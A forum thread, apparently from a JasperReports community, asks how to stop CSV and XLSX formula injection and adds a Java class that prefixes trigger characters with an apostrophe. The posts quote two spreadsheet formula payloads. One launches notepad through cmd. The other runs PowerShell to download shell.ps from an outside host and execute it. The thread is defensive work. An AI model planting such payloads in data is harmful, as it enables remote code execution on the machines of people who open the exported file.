cardel Posted April 18, 2018

Is it possible to set some properties or data filters to prevent CSV injection?

I am exporting data from a JSON collection to a report in CSV format. A penetration test found out that there can be a problem with CSV injection. Someone can add "=cmd|' /C notepad'!'A1'" to an exported field, and this will cause Excel to open notepad or other scripts.

Is it possible to automatically escape some special characters in fields? I tried

[code]csvExporterConfiguration.setForceFieldEnclosure(true);[/code]

but with no effect. I need to escape the +, -, =, @, | characters. Can I do it somehow in JasperReports, or should I do this data modification before exporting the report?

Regards
Karel
asookaziangmail.com Posted August 9, 2021

Interested in any answers/guidance as well on this topic of formula injection in CSV and XLSX use cases.

Reference: https://pentestmag.com/formula-injection/

Is it possible to set some config/property such that the JRXlsxExporter will auto-prepend a space or apostrophe in front of "=cmd***" in any textFields that are saved as such in the db tables queried by the report query?

For example, assume the Person.FirstName value in the db table is the following:

=cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!z

which could be a malicious download script attempt in a formula field. Would it be possible to prevent such an attack specifically in the fillReport() intercept or similar?

This is "supposed" to solve the problem with CSV (can you provide an example? the original poster says it doesn't work):
http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleCsvExporterConfiguration.html#setForceFieldEnclosure-java.lang.Boolean-

Unfortunately, the same APIs don't exist for http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleXlsxExporterConfiguration.html

Why don't the same APIs exist for force field enclosure for XLSX?
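Both posts above ask the same thing: how to make sure a stored value such as "=cmd|' /C notepad'!'A1'" is written out as text rather than as a formula. Field enclosure alone does not do that, because a spreadsheet still evaluates a quoted cell whose content starts with a trigger character. The usual mitigation is to neutralise the value at the data layer before it reaches any exporter (CSV or XLSX), by prefixing a leading =, +, -, @, tab or CR (and, as the first post requests, |) with an apostrophe, and by properly quoting the field. The class below is an added example for this thread, not JasperReports code; FormulaSafeCsv, sanitizeCell, quoteField, toCsvRow and sanitizeRecord are names chosen here, and the sample values are constructed. It assumes Java 11 or later for String.stripLeading().

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;

/**
 * Neutralises spreadsheet formula triggers in cell values before they are
 * handed to a CSV/XLSX exporter. Added example code for this thread; it is
 * not part of JasperReports.
 */
public final class FormulaSafeCsv {

    // Characters that make Excel/LibreOffice treat a cell as a formula,
    // plus '|' which the original poster also wants escaped.
    private static final String TRIGGERS = "=+-@|\t\r";

    /** Defuse one value: prefix a leading trigger character with an apostrophe. */
    public static String sanitizeCell(String value) {
        if (value == null || value.isEmpty()) {
            return value;
        }
        // Check after stripping leading whitespace: " =1+1" is still evaluated.
        String trimmed = value.stripLeading();
        if (!trimmed.isEmpty() && TRIGGERS.indexOf(trimmed.charAt(0)) >= 0) {
            return "'" + value;
        }
        return value;
    }

    /** Quote a field for CSV: always enclose it and double any embedded quote. */
    public static String quoteField(String value) {
        String v = value == null ? "" : value.replace("\"", "\"\"");
        return "\"" + v + "\"";
    }

    /** Build one CSV row from values that have already been sanitised. */
    public static String toCsvRow(List<String> cells) {
        return cells.stream()
                    .map(FormulaSafeCsv::quoteField)
                    .collect(Collectors.joining(","));
    }

    /**
     * Sanitise every String value in one record, e.g. a map that will later be
     * wrapped in a JRMapCollectionDataSource. Non-string values are left alone,
     * so numeric fields typed as numbers are never prefixed.
     */
    public static Map<String, Object> sanitizeRecord(Map<String, ?> record) {
        Map<String, Object> out = new HashMap<>();
        for (Map.Entry<String, ?> e : record.entrySet()) {
            Object v = e.getValue();
            out.put(e.getKey(), v instanceof String ? sanitizeCell((String) v) : v);
        }
        return out;
    }

    public static void main(String[] args) {
        // Constructed sample values modelled on the examples in this thread.
        List<String> raw = Arrays.asList(
            "=cmd|' /C notepad'!'A1'",
            "+1-555-0100",
            "@mention",
            "Smith, \"Jr\"",
            "plain text");
        List<String> safe = raw.stream()
                               .map(FormulaSafeCsv::sanitizeCell)
                               .collect(Collectors.toList());
        System.out.println(toCsvRow(safe));
    }
}
```

Running main prints one row in which the first three fields start with an apostrophe, so Excel displays them as literal text, while "plain text" is untouched and the embedded quote in the fourth field is doubled. Applying sanitizeRecord to each record before building the report data source covers every export format the same report is rendered to, which is why the data layer is the better place for it than an exporter configuration that exists only for CSV. The trade-off is that genuine values beginning with - or + (negative numbers, phone numbers) also receive the prefix when they are stored as strings; keeping numeric columns typed as numbers avoids both the injection and that side effect.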